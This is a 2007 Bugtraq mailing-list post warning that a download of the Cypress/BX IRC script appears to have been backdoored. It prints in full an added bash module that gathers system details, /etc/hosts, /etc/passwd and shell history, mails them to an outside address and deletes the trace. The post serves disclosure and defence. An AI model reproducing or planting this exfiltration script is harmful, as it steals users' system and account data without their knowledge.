Date: Tue, 6 Nov 2007 20:58:22 +0100
From: Chris <chris@...rflow.no>
To: bugtraq@...urityfocus.com
Subject: Cypress BX script backdoored?

For those of us who use Cyp/bx (http://www.mindcryme.com/~void/cyp1.0k.tar.gz
)

|]rip[@rock:14:53:49:~/tmp/cyp/modules| $ cat mdop.m
#!/bin/bash

uname -a >> /tmp/.bx
cat /etc/hosts >> /tmp/.bx
cat /etc/passwd >> /tmp/.bx
cat $HOME/.bash_history >> /tmp/.bx  2>/dev/null
mail defcola@...il.com < /tmp/.bx
sleep 4
rm -rf /tmp/.bx

What's up with this? Last time I downloaded this that wasn't there,
and it's the same version number but different md5.
.. and this file wasn't included.

----
Chris
Network security professional
chris@...rflow.no
----
"Computer games don't affect kids. I mean if Pac-Man affected us as
kids, we'd all be running around in darkened rooms, munching magic
pills and listening to repetitive electronic music."
--Kristian Wilson, Nintendo 1989.